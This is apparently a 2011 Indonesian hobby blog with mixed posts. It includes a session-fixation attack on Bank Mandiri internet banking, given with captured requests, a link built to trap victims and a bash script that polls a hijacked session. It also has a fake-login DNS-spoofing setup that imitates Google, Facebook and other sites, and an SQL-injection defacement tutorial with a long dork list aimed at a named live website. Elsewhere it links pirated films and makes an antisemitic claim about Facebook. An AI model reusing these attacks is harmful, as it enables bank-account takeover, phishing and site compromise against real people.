Tuesday 27 December 2011

Menghilangkan Iklan Di Facebook

BY Putra Muharril IN No comments

Facebook?? Ada yang belum tahu?! :D . Sebagian dari kita sempat berfikir, facebook adalah perusahaan milik seorang yahudi Amerika. Bisa jadi, keuntungan facebook digunakan untuk mendanai Zionisme Israel.
Apa jadinya kalau kita membantu mereka mengumpulkan uang untuk mendanai paham dan tindakan yang melanggar hak asasi manusia itu???
Nah, Facebook mendapatkan untung dari iklan per klik-nya (itu yang saya tahu). Untuk menghindari kita mengklik iklan, kita bisa menghilangkan tamplilan iklan di Facebook dengan menggunakan add-on dari Firefox. Nama add-on firefox itu adalah Stylist. Okey, kita mulai saja langkah-langkah tips menghilangkan iklan di facebook (remove ads):
  1. Login di facebook. (tentu, Anda harus punya facebook untuk bisa login. :D )
  2. Buka link ini: https://addons.mozilla.org/en-US/firefox/addon/2108.
  3. Klik tombol add to Firefox di halaman add-on tersebut.
  4. Restart firefox (tutup firefox lalu buka firefox lagi).
  5. Buka facebook menggunakan firefox.
  6. Klik gambar kertas dan kuas yang ada di ujung kanan bawah firefox (firefox sedang membuka halaman facebook).
  7. Pilih submenu Find Styles for this page.
  8. Pada halaman baru yang terbuka, pilih menu Remove Ads.
  9. Lihat bagian Install Options, klik tombol “Load into Stylish” -> save.
  10. Cek di halaman facebook kamu. Apakah iklannya sudah tidak muncul lagi?
Okey, insya Allah iklan di facebook kamu sudah tidak muncul lagi. Lalu, bagaimana caranya agar iklan tersebut muncul lagi? Karena terkadang, kita butuh iklan itu juga. Okey, akan saya jelaskan langkah sederhana mengembalikan/memunculkan kembali iklan di facebook. Langkah memunculkan kembali iklan di facebook:
  1. Klik menu Tools di bagian atas firefox.
  2. Klik submenu Add-ons.
  3. Pada window add-ons, cari add-on Stylish lalu klik tombol Option-nya.
  4. Hapus stylish untuk “remove ads” untuk facebook.
  5. Cek Facebook kamu.
Okey, insya Allah sekarang facebook kamu akan kembali menampilkan iklan.
Note akhir: Ada yang tahu, apakah facebook hanya mendapatkan pemasukan dari klik iklan saja? Apakah dengan menghilangkan iklan facebook masih bisa mendapatkan pemasukan?

Friday 18 November 2011

Menjebak pembobol hotspot dengan Login Palsu

BY Putra Muharril IN No comments

Usaha Internet dengan layanan Hotspot makin marak dan potensi peluang bisnis cukup menguntungkan karena hanya bermodalkan 1 Unit server, 1 Unit Acces point, serta paket Internet 1 MB sudah bisa mendirikan Usaha Hotspot untuk Skala RT/RW dengan keuntungan yang bisa mencapai 2 X lipat perbulan jika dikelola secara profesional.
Sangat disayangkan jika system hotspot  yang telah dibuat dengan serapih mungkin akhirnya dibobol dan fasilitas internetnya digunakan secara gratis oleh orang yang tidak betanggung jawab.
Berikut ini Trik Sederhana untuk membantu para Admin Jaringan Hotspot  guna mengidentifikasi para pembobol dengan membuat jebakan Web Palsu (Fake Login).
Persiapan :
1. Unit PC dengan Sistem Operasi Linux
2. Webserver
3. DNS Server
4. Fake Login (Yahoo, Google, Facebook dll,) sesuaikan dengan kebutuhan makin banyak makin bagus
Langkah-langkah
1. Install lah webserver dan DNS server 
# apt-get install apache2 dnsmasq
2.Buatlah direktori untuk menyimpan fake login (Halaman web palsu) makin banyak makin bagus.
# mkdir -p /home/www/fake/google.com
# mkdir -p /home/www/fake/yahoo.com
# mkdir -p /home/www/fake/facebook.com
# mkdir -p /home/www/fake/twitter.com
3. Simpanlah halaman Google, yahoo, facebook, twitter di direktori yang telah kita buat tadi dan modifikasi halaman loginnya untuk membuat fake login.Cara Membuatnya silahkan cari di Forum-forum yang membahas tentang fake login.
4. Konfigurasi Server Apache anda
# vi /etc/apache2/sites-available/fake.google.com
Masukan konfigurasi berikut 
NamaVirtualHost *

ServerName google.com
ServerAlias www.google.com
DocumentRoot /home/www/fake/google.com

Options FollowSymLinks
AllowOverride None

Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
5. Simpan Konfigurasi. 
6. Lakukan  langkah 4-5 sama untuk Yahoo, Facebook, dll
7. Aktifkan fake loginnya dengan cara
# a2ensite fake.google.com
# a2ensite fake.yahoo.com
# a2ensite fake.facebook.com
# a2ensite fake.twitter.com
8. Selanjutnya adalah membuat DHCP Server untuk memberikan IP pada target dan DNS Server
9. Konfigurasi DNS Server
#vi /etc/dnsmasq.com
10. Masukan data berikut di file /etc/dnsmasq.com
interface=eth0
domain=deanet.com
dhcp-lease-max=50
dhcp-authoritative
dhcp-range=192.168.0.10,192.168.1.100,1440m
11. Simpan konfigurasi
12. Selanjutnya adalah membuat record host name untuk fake login dengan mengedit file /etc/hosts
# vi /etc/hosts
13. Isikan data ini pada /etc/hosts dengan alamat situs fake login tersebut seperti berikut:
192.168.0.1 www.google.com
192.168.0.1 google.com
192.168.0.1 www.yahoo.com
192.168.0.1 yahoo.com
192.168.0.1 www.facebook.com
192.168.0.1 facebook.com
192.168.0.1 www.twitter.com
192.168.0.1 twitter.com
Sesuaikan jika memiliki beberapa situs
14. Langkah terakhir adalah menjalankan webservernya
# /etc/init.d/network restart
# /etc/init.d/apache2 restart
# /etc/init.d/dnsmasq restart
Untuk Konfigurasi akses point silahkan sesuaikan dengan jenis alatnya. anda juga dapat menambahkan Honeypot untuk menganalisis Metode pembobol Hotspot yang nantinya bisa dikembangkan untuk Keamanan lanjutan.

Apa itu OPEN SOURCE ?

BY Putra Muharril IN No comments

Jika diartikan menurut arti kata, – Open Source- dalam bahasa Indonesia berarti Kode Terbuka. Kode yang dimaksud disini bukanlah kode morse, ataupun kode barang, tetapi yang kode yang dimaksud disini adalah Kode Program. Kode Program yang dimaksud adalah perintah – perintah yang diketikkan berdasarkan logika yang benar.

Suatu program dengan lisensi Open Source berarti program tersebut membuka Kode Programnya bagi siapa saja yang ingin mempelajarinya, caranya dengan menyertakan kode program bersama dengan distribusi paket program yang sudah jadi (hasil kompilasi). Dengan penyertaan kode program tersebut, pembeli atau pengguna program dapat membedah program tersebut, melakukan modifikasi sesuai dengan kebutuhannya, bahkan memperbaiki -Bug- atau kesalahan logika dalam program tersebut. Contoh program yang Open Source adalah Linux. Dalam setiap distribusinya vendor Linux juga menyertakan Kode Program Linux.

Satu hal yang perlu ditekankan adalah bahwa program / software yang Open Source tidak selalu tersedia secara gratis. Tetap ada biaya yang dikeluarkan untuk membeli program tersebut. Contoh, misalnya Sistem Operasi RedHat Linux, program Linuxnya tetap dibeli dengan harga yang murah. Lalu, apa bedanya Open Source dengan -Closed Source- .

Pada program yang -Closed Source-, paket program tidak dapat didistribusikan lagi selain oleh pembuat / vendor program tersebut. Jika ada distribusi yang bukan oleh vendor program tersebut, maka itu dianggap sebagai pembajakan software. Atau dengan kata lain program yang -Closed Source- tidak dapat didistribusikan secara bebas, kecuali oleh vendor program tersebut. Sedangkan software yang Open Source, dapat didistribusikan secara bebas oleh siapapun. Paket program juga dapat digandakan secara bebas.

Tujuan Open Source sebenarnya adalah ingin menghilangkan ketergantungan terhadap vendor program, dimana vendor bisa saja bertindak seenaknya. Dalam program yang -Closed Source- vendor bisa saja menyisipkan kode – kode yang mungkin dapat membahayakan pengguna program, dan menghilangkan privasi pengguna.

Selain itu, Open Source juga bertujuan menyediakan software yang mudah dijangkau oleh masyarakat luas, dan menghindari pengerukan keuntungan yang berlebihan oleh vendor.
Bagi kalangan IT khususnya di Indonesia, dengan adanya software yang Open Source dapat mendorong semangat untuk mengembangkan program bagi tenaga – tenaga TI di Indonesia. Sebab dengan mempelajari kode program, dapat dianalisa dimana kelemahan program, apa sesungguhnya proses yang berlangsung dalam kerja program, dan sekaligus mencari solusi terhadap kelemahan program yang ditemui. Atau yang lebih extreem adalah memodifikasi program sedemikian rupa agar lebih ergonomis / pas digunakan sesuai dengan keperluan.

Sebagai tenaga yang bergerak di bidang TI, tentunya kita tidak boleh hanya menjadi End User yang hanya mampu memanfaatkan hasil kerja orang lain. Sebab dengan demikian sampai selama – lamanya bidang TI kita akan tertinggal dari negara – negara lain. Kalau hanya ingin menjadi End User, untuk apa kita susah – susah membuang waktu dan biaya yang tidak sedikit untuk menjadi S.Kom ???? Kalau memang hanya ingin menjadi End User lebih efektif dan efisien mengikuti kursus.

Hal inilah yang masih belum disadari oleh kebanyakan Pengajar maupun mahasiswa bidang Teknologi Informasi di Indonesia. Seorang S.Kom bukan dipersiapkan untuk menjadi pengguna, melainkan dipersiapkan untuk menjadi Analis Sistem yang dapat merancang baik software maupun hardware. Dengan menggunakan program yang Open Source bukankah telah terbuka jalan yang sangat lebar untuk menuju ke arah tersebut ?????

Dengan mempelajari kode program yang Open Source kita dapat menganalisa teknik yang digunakan dalam pembuatan software tersebut, yang nantinya pengetahuan tersebut dapat dimanfaatkan untuk merancang aplikasi yang berguna ?????

Harus diakui bahwa jika kita bekerja sebagai Software Developer yang Open Source, akan mengurangi jumlah pendapatan yang akan diterima jika dibandingkan dengan Software Developer yang -Closed Source-, sebab software yang kita buat dapat di distribusikan secara bebas oleh orang lain tanpa membayar lisensi kepada kita.

Namun, ada yang jauh lebih berarti dibandingkan dengan uang tersebut. Yaitu Perbuatan Amal. Dengan mengeluarkan program yang Open Source, dimana pengguna dapat melihat, mempelajari, dan memodifikasi Kode Program, dapat dibayangkan berapa banyak orang yang memperoleh pengetahuan dari program kita, berapa banyak mahasiswa yang dapat meningkatkan kemampuannya dengan mempelajari software yang kita buat. Belum lagi umpan balik yang diberikan oleh pengguna
yang mengetahui kelemahan program kita dan memberikan solusinya, yang dapat meningkatkan kemampuan dan pengetahuan kita.

Lagipula, vendor seperti RedHat yang selama ini bergerak sebagai Software Developer yang Open Source tidak menjadi bangkrut malahan semakin maju. Mengapa ????? Sebab, pengguna yang awam dengan sistem komputer tetap akan menghubungi vendor program jika terjadi masalah dengan program. Karena mereka menganggap bahwa vendor tentu lebih memahami programnya dibandingkan dengan teknisi yang lain.

Namun, pilihan untuk mengikuti Open Source atau tidak tetap bergantung pada diri kita masing – masing. Seandainya anda berkeinginan menjadi Software Developer yang kaya raya seperti Bill Gates, mungkin anda memilih menjadi Software Developer yang -Closed Source-.
Sebaliknya, jika anda adalah seorang yang senang berbagi ilmu dan pengalaman tentunya anda lebih senang menjadi Software Developer yang Open Source, namun itu tentunya kemungkinan kecil dapat menjadikan anda sekaya Bill Gates. Well, pilihan tetap berada pada diri kita masing – masing.

Sunday 6 November 2011

Hacking Mandiri Internet Banking dengan Fixation

BY Putra Muharril IN No comments

courtesy of bank mandiriDalam artikel ini saia akan menggunakan jurus session fixation untuk membajak session internet banking Mandiri yang merupakan bank terbesar di tanah air.

Session ID Bank Mandiri Internet Banking ......
Internet banking mandiri menggunakan sessionid yang disimpan dalam cookie dengan nama JSESSIONID. Sessionid ini sangat panjang dan acak, jadi tidak mungkin memakai jurus prediction untuk mendapatkan sessionid. Contoh sessionid bank mandiri adalah:
JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002
Fixate sessionid yang dipilih sendiri dengan query string
Untuk memastikan apakah internet banking mandiri bisa diserang dengan session fixation, saya akan coba memasukkan query string JSESSIONID berisi string yang saya pilih sendiri. Saya coba dengan query string JSESSIONID=01234567890. Berikut adalah request dan response yang terjadi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
https://ib.bankmandiri.co.id/retail/Login.do?action=form&JSESSIONID=01234567890
 
GET /retail/Login.do?action=form&JSESSIONID=01234567890 HTTP/1.1
Host: ib.bankmandiri.co.id
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Mon, 02 Feb 2009 23:28:58 GMT
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 3822
Content-Type: text/html
Expires: -1
Transfer-Encoding: Chunked
Set-Cookie: JSESSIONID=JHB9fR0rxOD53jgT3h1x57kAmFAqo8s2fp28UZvDxs2zLupl0s1Q!568454685!-1062708981!7668!7002; path=/
Cache-Control: no-cache
Ternyata usulan saya ditolak mentah-mentah oleh server, hal ini terlihat dari responsenya yang memberikan sessionid dalam bentuk cookie pada baris ke-21. Dari response tersebut juga bisa diambil kesimpulan bahwa server bank mandiri lebih suka memakai cookie sehingga bila ada client yang memberikan sessionid dalam query string, dibalas dengan header Set-Cookie. Ini pertanda bagus karena cookie yang diberikan pada korban akan memudahkan serangan saya.
Fixate sessionid yang dibangkitkan server dengan query string
Oke, setelah gagal mengusulkan sessionid sembarangan dengan query string. Saya akan coba lagi dengan sessionid yang dibangkitkan server. Untuk itu sebelumnya saya harus meminta server memberikan sessionid. Dalam contoh ini saya akan gunakan sessionid yang sudah saya minta sebelumnya, yaitu:
JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002
Sessionid ini akan saya kirimkan dalam request dalam bentuk query string. Sebelumnya cookie yang ada harus dihapus karena cookie memiliki prioritas lebih dibanding query string dalam hal sessionid. Berikut request dan response yang terjadi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
https://ib.bankmandiri.co.id/retail/Login.do?action=form&JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002
 
GET /retail/Login.do?action=form&JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002 HTTP/1.1
Host: ib.bankmandiri.co.id
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Mon, 02 Feb 2009 23:37:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 3824
Content-Type: text/html
Expires: -1
Transfer-Encoding: Chunked
Set-Cookie: JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002; path=/
Cache-Control: no-cache
Hore berhasil. Pada response server ternyata menyetujui untuk memakai sessionid yang saya usulkan melalui query string. Tidak hanya itu, server malah membantu saya dengan membuat cookie dengan isi sessionid usulan saya. Jadi pada request berikutnya saya tidak perlu menambahkan query string karena sudah otomatis cookie terkirimkan. Ini adalah kondisi yang sempurna untuk serangan fixation attack karena serangan bisa dilakukan secara remote dan session cookie akan tercipta otomatis di browser korban.
Skenario Serangan
Skenario serangan menggunakan jurus session fixation pada Mandiri Internet banking ini adalah:
  1. Attacker mengirimkan link kepada calon korban.
  2. <a target="_blank" href="https://ib.bankmandiri.co.id/retail/Login.do?action=form&JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002">
    Klik Dong</a>
    Perhatikan link tersebut baik-baik. Link tersebut tidak tampak mencurigakan seperti phishing link. Pengguna yang teliti akan memeriksa link tersebut:
    • Apakah domainnya benar? Benar! Domain link tersebut ib.bankmandiri.co.id
    • Apakah pakai https? Benar! URL tersebut diawali dengan https
    • Apakah pathnya benar? Benar! Path URL tersebut adalah /retail/Login.do
    Karena semuanya benar, calon korban akan yakin bahwa itu bukan link phishing berisi fake login page. Padahal sebenarnya link itu mengandung jebakan sessionid fixation. Dan sayangnya tidak pernah ada informasi tentang bahaya ini dari bank yang bersangkutan.
  3. Korban mengklik link tersebut.
  4. Pada saat korban mengklik link tersebut, maka korban telah terjebak menggunakan sessionid yang sudah disiapkan oleh attacker. Pada browser korban akan tercipta sebuah cookie JSESSIONID yang berisi sessionid. Sehingga semua request dari browser korban ke bank mandiri internet banking selalu menggunakan sessionid tersebut.
    Untuk coba-coba silakan anda buka link tersebut, kemudian periksa cookie anda. Apakah benar ada cookie berisi sessionid yang isinya sama dengan yang attacker inginkan?
  5. Korban login
  6. Setelah korban membuka halaman login, selanjutnya korban akan memasukkan username dan passwordnya. Bila login sukses, maka korban bisa mengakses accountnya, dan begitu pula attacker karena keduanya berbagi sessionid yang sama.
  7. Attacker mengakses account korban
  8. Karena korban dan attacker menggunakan sessionid yang sama, server menganggap attacker dan korban adalah orang yang sama, yaitu pemegang account yang sah. Nun jauh di sana, attacker selalu memeriksa status session yang sessionidnya diberikan pada korban. Begitu korban berhasil login, pada saat itu juga attacker akan mengakses account korban.
Bahayanya serangan ini adalah serangan ini bisa memakan banyak korban. Ingat bahwa setelah korban selesai memakai accountnya, dia akan logout. Pada titik ini attacker tidak bisa lagi mengakses account korban. Tapi jangan lupa bahwa cookie berisi sessionid masih ada di browser korban, sehingga setiap kali ada request dari browser itu akan menggunakan sessionid yang sudah ditentukan attacker. Bila ada korban lain memakai browser itu dan login ke mandiri juga, maka orang itu juga akan menjadi korban.
Session Status Checker
Agar session tidak expired, attacker harus melakukan request terus menerus dengan sessionid itu, dengan begini server akan berpikir bahwa sessionid tersebut masih aktif dipakai. Di komputer lain saya telah membuat script sederhana untuk memeriksa status session dengan sessionid tertentu, statusnay apakah “Dead” (tidak ada yang login) atau “Alive” (sedang dipakai orang dan belum logout).
1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash
while [ true ] ; do
NOREK=`curl -s "https://ib.bankmandiri.co.id/retail/Welcome.do?action=result" -b kue.txt |grep '<td align="center" height="25" bgcolor="#DDF2FA">[0-9]*</td>'|cut -f2 -d">"|cut -f1 -d"<"`
if [ -z "$NOREK" ]
then
        echo "Dead"
else
        echo "Alive, Norek: $NOREK"
fi
sleep 10
done
Script tersebut memerlukan cookie yang disimpan dalam file kue.txt. File tersebut menyimpan cookie yang akan dikirim pada setiap request. File tersebut mengikuti format dari curl. Agar mudah, sebelumnya saya sengaja meminta cookie dengan curl ke ib.bankmandiri.co.id dan menyimpannya di file kue.txt, kemudian file tersebut saya edit dengan mengganti sessionidnya dengan sessionid yang saya target. Saya memasukkan sessionid yang sama dengan yang saya pakai dalam contoh-contoh sebelumnya di atas, yaitu JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002
mandiri check session
mandiri check session
Perhatikan pada gambar di atas, script saya akan looping terus untuk mengirim request dengan cookie berisi sessionid. Bila halaman “/retail/Welcome.do?action=result” berisi “Nomor Rekening”, berarti sessionid tersebut sedang dipakai oleh seseorang.
Perhatikan juga bahwa server bank mandiri tidak peduli dengan fakta bahwa ada 2 request dari ip address dan user agent yang berbeda. Script tersebut dijalankan di Linux dengan IP address yang berbeda dengan request yang dilakukan dari browser korban. Karena request dilakukan dengan curl, maka user agent headernya pun berbeda dengan browser korban. Tapi server tidak peduli dengan semua perbedaan itu, selama request yang datang membawa cookie berisi sessionid yang benar, maka dia berhak mendapatkan akses.
Di internet, siapapun yang membawa sessionid anda, akan menjadi anda!
Pada gambar tersebut juga terlihat bahwa korban bisa login atau logout berkali-kali, namun tetap menjadi korban attacker. Hal ini terjadi karena cookie berisi sessionid masih tetap ada di browser korban walaupun korban sudah logout. Jadi kalau ada yang login lagi, maka dia juga akan memakai sessionid yang sama.
Modifikasi Cookie Expired Date secara Lokal
modified expired date
modified expired date
Kelemahan dari serangan remote di atas adalah batas waktu cookie adalah hingga browser ditutup. Begitu browser ditutup, cookie yang expired akan dihapus. Bila attacker memiliki akses fisik, maka akibat serangannya akan semakin dahsyat. Attacker akan memodifikasi tanggal expired session cookie pada browser korban. Tanggal expirednya akan diubah menjadi tahun 2099 misalnya, sehingga cookie tersebut akan tetap ada sampai 2099. Dengan begini semua orang yang login dengan browser itu di komputer itu akan menjadi korban attacker nun jauh di sana yang selalu sabar menanti dengan script session checkernya.
Tips Pencegahan
Sederhana saja cara untuk mencegah agar tidak terkena jebakan batman dari attacker. Sebelum login ke halaman internet banking mandiri, hapus semua cookie yang ada dan query string yang mengandung sessionid. Dengan cara ini sessionid yang dipakai adalah sessionid yang diberi oleh server yang tidak diketahui attacker.
Kesimpulan
Saya telah menunjukkan proof of concept serangan session fixation pada internet banking mandiri. Serangan ini sangat berbahaya karena bisa diserang dari jarak jauh dan korbannya tidak hanya satu orang, tapi semua orang yang login di browser dan komputer yang sama. Sayangnya serangan ini tidak setenar SQL injection atau XSS, padahal serangan ini sama berbahayanya sehingga orang banyak yang tidak aware dengan ancaman ini.
Serangan ini juga tipe serangan yang tidak bisa dicegah dengan https karena serangan ini berada di layer aplikasi. Jadi logic aplikasinya yang harus diperbaiki, bukan pada level protokol https....

Sunday 28 August 2011

Download Gratis Film" Hacker

BY Putra Muharril IN No comments


Dated Released : 15 September 1995
Quality : DVDRip
Runtime : 107 min
Starring : Jonny Lee Miller, Angelina Jolie, Jesse Bradford
Genre : Action | Crime | Drama | Thriller
Size : [300MB-mkv]
_________________

Online




TAKE DOWN
Date Released : 15 March 2000
Quality : DVDRip
Starring : Skeet Ulrich, Russell Wong, Angela F
Genre : Thriller | Action
Size : [670MB-Avi]
_________________

Online

PostSubyek: Re: HACKERS MOVIE   Tue Mar 08, 2011 1:40 am


PIRATES OF SILICON VALLEY
Dated Released : 20 June 1999
Quality : DVDRip
Starring : Noah Wyle, Joey Slotnick, J.G. Hertzler
Genre : Biography | Drama
SiZe : [695MB-Avi]
_________________

Online

PostSubyek: Re: HACKERS MOVIE   Tue Mar 08, 2011 1:46 am

ANTITRUST
Dated Released : 12 January 2001
Quality : DVDRip
Starring : Ryan Phillippe, Rachael Leigh C, Claire Forlani
Genre : Thriller | Crime | Drama
Size : [665MB-Avi]
_________________

Online

PostSubyek: Re: HACKERS MOVIE   Tue Mar 08, 2011 5:04 am

THE NET
Release Date: 28 July 1995
Quality : DVDRip
Starring : Sandra Bullock, Jeremy Northam and Dennis Miller
Genre : Action | Crime | Drama | Thriller
Size : [716MB-Avi]
_________________

Online

PostSubyek: Re: HACKERS MOVIE   Tue Mar 08, 2011 5:25 am

SWORD FISH
Release Date: 8 June 2001
Quality : DVDRip
Starring : John Travolta, Hugh Jackman and Halle Berry
Genre : Action | Thriller | Crime
Size : [674MB-Avi]
_________________
REVOLUTION OS
Release Date: 15 February 2002
Quality : DVDRip
Starring : Linus Torvalds, Richard M. Stallman and Eric Raymond
Genre : Documentary | Comedy
Size : [692.61MB-Avi]
TRON
Movie info
h**ker/arcade owner Kevin Flynn who is digitally broken down into a data stream by a villainous software pirate known as the Master Control and reconstituted into the internal, 3-D graphical world of computers. It is there, in the ultimate blazingly colorful, geometrically intense landscapes of cyberspace, that Flynn joins forces with Tron to outmaneuver the Master Control program that holds them captive in the equivalent of a gigantic, infinitely challenging computer game.
Release Date: 9 July 1982
Quality : BRRip
Starring : Jeff Bridges, Bruce Boxleitner and David Warner
Genre : Action | Adventure | Sci-Fi
Size : [600MB-mkv]
Code:
http://www.mediafire.com/?g97pmzgx011amal http://www.mediafire.com/?sjc36yy8lsglbru
http://www.mediafire.com/?w4obfh5uh200w87
http://www.mediafire.com/?c0j5zlnwkl5pbxw
Password : 300mbfilms.com
kalau di pelemnya g ada subtitlenya kangcoba cari di
Code:
http://www.allsubs.org/search-subtitle/indonesia/ http://www.podnapisi.net/
http://subscene.com/
http://www.mysubtitles.org/

Cara Cepat Deface Website Dengan Tools SQLI Helper

BY Putra Muharril IN 1 comment

Langkah pertama, download tools SQLI Helper V 2.7 =KLIK HERE=


Langkah Kedua, Mencari Website
Kita harus mencari url yang bisa di hack. Bagaimana cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan Google, apapun yang kita cari bisa kita dapatkan. Kita hanya menuliskan Dork ke dalam penelusuran Google

Kumpulan perintah Google dorkscript dork SQL injection :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda.
Langkah Ketiga, Attack
Sebelum memulai attacker kita harus menemukan website yang bisa di hack. Dari ribuan website dari dork tersebut, belum tentu salah satunya yang bisa di hack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316′. Jika terdapat tulisan
Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’1 ORDER BY lastname’ at line 1 SELECT * FROM person_old WHERE id=\’1 ORDER BY lastname. Atau Sebagainya yang mirip. 
Berarti Website tersebut bisa di hack.
Copy Url yang kamu dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. (tidak pakai tanda petik)
Kemudian klik Inject. Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.
Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.
Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.
Langkah Keempat, Kolom Sql
Jika sudah pilih User kalian klik get Coloumns.
